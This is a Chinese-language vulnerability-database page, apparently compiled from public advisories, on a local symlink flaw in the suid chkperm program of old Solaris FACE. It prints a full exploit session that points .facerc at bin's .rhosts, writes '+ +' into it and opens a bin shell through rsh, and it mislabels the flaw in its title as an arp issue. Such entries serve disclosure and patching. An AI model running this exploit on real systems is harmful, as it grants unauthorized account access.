发布时间 :1999-12-01 00:00:00
修订时间 :2008-09-09 08:36:03

[原文]Solaris chkperm allows local users to read files owned by bin via the VMSYS environmental variable and a symlink attack.

[CNNVD]Solaris arp漏洞(CNNVD-199912-010)


- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

Solaris arp漏洞
低危 其他
1999-12-01 00:00:00 2005-10-20 00:00:00

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at:

- 漏洞信息 (19235)

Solaris <= 7.0 chkperm Vulnerability (EDBID:19235)
solaris local
1996-12-05 Verified
0 Kevin L Prigge
N/A [点击下载]

Solaris 2.4, 2.5, and 2.5.1 (possibly other versions) have a package called FACE (Framed Access Command Environment) installed. Included in the package is a program called chkperm which checks a file to see if the user has permission to use the FACE interface. This program is installed suid and sgid bin, and is trivially exploitable to compromise the bin account under Solaris 2.4.

Running chkperm in a directory that has world write privilege or in a directory that belongs to bin. chkperm on Solaris 2.5 seems to create a file called <gibberish characters> in the directory from where you execute it. chkperm needs write access for user bin (or group bin) to the directory from which you execute it. It also works the same with just 'chkperm -l', you can set the environment variable VMSYS to anything.

You could then create the link (to .rhosts in the example) using the <gibberish characters> file name created by chkperm and accomplish the same result. 

% mkdir /tmp/foo
% mkdir /tmp/foo/lib
% chmod -R 777 /tmp/foo
% setenv VMSYS /tmp/foo
% umask 0000
% ln -s /usr/bin/.rhosts /tmp/foo/lib/.facerc
% /usr/vmsys/bin/chkperm -l -u foo
% ls -l /usr/bin/.rhosts
-rw-rw-rw- 2 bin bin 0 Nov 12 09:41 .rhosts
% echo "+ +" >> /usr/bin/.rhosts
% ls -l /usr/bin/.rhosts
-rw-rw-rw- 2 bin bin 4 Nov 12 09:41 .rhosts
% rsh -l bin localhost /bin/csh -i
Warning: no access to tty; thus no job control in this shell...
% id
uid=2(bin) gid=2(bin)


- 漏洞信息

Solaris FACE chkperm VMSYS Environmental Variable Symlink Arbitrary File Disclosure
Local Access Required Information Disclosure, Input Manipulation
Loss of Confidentiality Workaround, Patch / RCS
Exploit Public

- 漏洞描述

Solaris chkperm utility contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a malicious user sets the VMSYS variable to a user writeable directory, creates a symlink to .facerc, then executes chkperm which will disclose the first five lines of the file given as an argument resulting in a loss of confidentiality.

- 时间线

1996-12-05 Unknow
1996-12-05 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Sun has released a patch (#109392-01) to address this vulnerability. In addition, this issue can be worked around by restricting permission to chkperm: chmod ug-s /usr/vmsys/bin/chkperm

- 相关参考

- 漏洞作者